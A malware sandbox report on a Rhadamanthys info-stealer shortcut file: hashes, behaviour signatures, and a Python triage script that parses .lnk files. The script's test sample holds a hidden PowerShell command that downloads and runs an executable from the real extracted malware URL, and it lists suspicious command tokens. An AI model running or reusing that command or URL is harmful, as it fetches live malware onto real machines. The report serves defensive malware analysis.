General
Target: 5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
Size: 1KB
Sample: 241008-xhgqnatfrp
MD5: ae44dfe179f7ab8400c90b2d208ff313
SHA1: 7f87bfe1edeccd7a01ff20519e92ba54e7d8e4a8
SHA256: 5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848
SHA512: 5b451ef8b7043300bd9809285f8f283f2bda096d06f80560e48c89e5992981f0b5de20ed8a3fcdf3e8ff5e4be5672791a713e68a39571d25683db02f5720922a
Static task: static1
Behavioral task: behavioral1
Sample: 5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
Resource: win7-20240708-en
Behavioral task: behavioral2
Sample: 5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
Resource: win10v2004-20241007-en
Malware Config
Extracted: https://1h982d.bemostake.space/test.txt
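The URL above was recovered from the 1 KB shortcut itself, which is the usual place such a dropper carries its stage-one download command. The script below is an added example (not part of this sandbox report and not Rhadamanthys code) of the static triage that produces that kind of extraction: it parses the ShellLinkHeader and StringData of a .lnk per MS-SHLLINK, reports the ShowCommand (7, SW_SHOWMINNOACTIVE, hides the console window), pulls URLs and suspicious tokens out of the target and arguments, and can be pointed at a real file with `python lnk_triage.py sample.lnk`. The embedded SAMPLE_LNK is constructed by `build_lnk` for offline testing; its PowerShell command line is hypothetical and only the URL in it is the one the sandbox extracted from the real sample. The parser skips the LinkTargetIDList, LinkInfo and ExtraData blocks, so arguments hidden in an EnvironmentVariableDataBlock or an oversized IDList would need a fuller parser.

```python
import re
import struct
import sys

# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# ShowCommand values; 7 hides the launched window and is a classic LNK-dropper tell
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# StringData fields appear in this fixed order, each gated by its LinkFlags bit
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Tokens worth flagging in a tiny LNK's target and arguments (assumed list, extend as needed)
SUSPICIOUS_TOKENS = ("powershell", "mshta", "cmd.exe", "-enc", "-w hidden",
                     "iwr ", "iex", "http://", "https://")


def parse_lnk(data: bytes) -> dict:
    """Parse ShellLinkHeader and StringData of a .lnk; IDList and LinkInfo are skipped."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_cmd = struct.unpack_from("<I", data, 0x3C)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize (2 bytes) then the ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize (4 bytes) covers the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    rec = {"flags": flags, "show_command": SHOW_COMMANDS.get(show_cmd, f"0x{show_cmd:x}")}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        if flags & IS_UNICODE:
            rec[name] = data[pos:pos + count * 2].decode("utf-16-le")
            pos += count * 2
        else:
            rec[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return rec


def triage(rec: dict) -> dict:
    """Reduce a parsed record to the URLs and findings an analyst wants first."""
    target = " ".join(rec.get(k, "") for k in ("relative_path", "arguments"))
    findings = []
    if rec["show_command"] == "SW_SHOWMINNOACTIVE":
        findings.append("hidden window (SW_SHOWMINNOACTIVE)")
    for tok in SUSPICIOUS_TOKENS:
        if tok in target.lower():
            findings.append(f"suspicious token: {tok.strip()}")
    urls = re.findall(r"https?://[^\s'\"<>]+", target)
    return {"urls": urls, "findings": findings}


def build_lnk(relative_path, working_dir, arguments, icon_location, show_cmd=7) -> bytes:
    """Assemble a minimal Unicode LNK (header + StringData only) for offline testing."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments, icon_location))
    return header + body


# Constructed sample, not the real dropper: only the URL is the one the sandbox extracted.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"%TEMP%",
    '-w hidden -c "iwr https://1h982d.bemostake.space/test.txt -OutFile $env:TEMP\\t.exe; start $env:TEMP\\t.exe"',
    r"%SystemRoot%\System32\shell32.dll",
)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_LNK
    rec = parse_lnk(data)
    for k, v in rec.items():
        print(f"{k:14} {v}")
    print(triage(rec))
```

Run it with no argument to see the constructed sample triaged; the hidden-window flag plus a PowerShell target that fetches a URL is exactly the combination the behavioral signatures below (blocklisted process makes network request, downloads MZ/PE file, executes dropped EXE) describe at runtime.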
Targets
Target: 5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk (same file and hashes as listed under General above)
Score: 10/10
Signatures:
- Rhadamanthys: an info stealer written in C++, first seen in August 2022.
- Suspicious use of NtCreateUserProcess with a spoofed parent process (OtherParentProcess)
- Blocklisted process makes network request
- Downloads MZ/PE file
- Checks computer location settings: looks up the country code configured in the registry, likely a geofence check.
- Deletes itself
- Executes dropped EXE
- Loads dropped DLL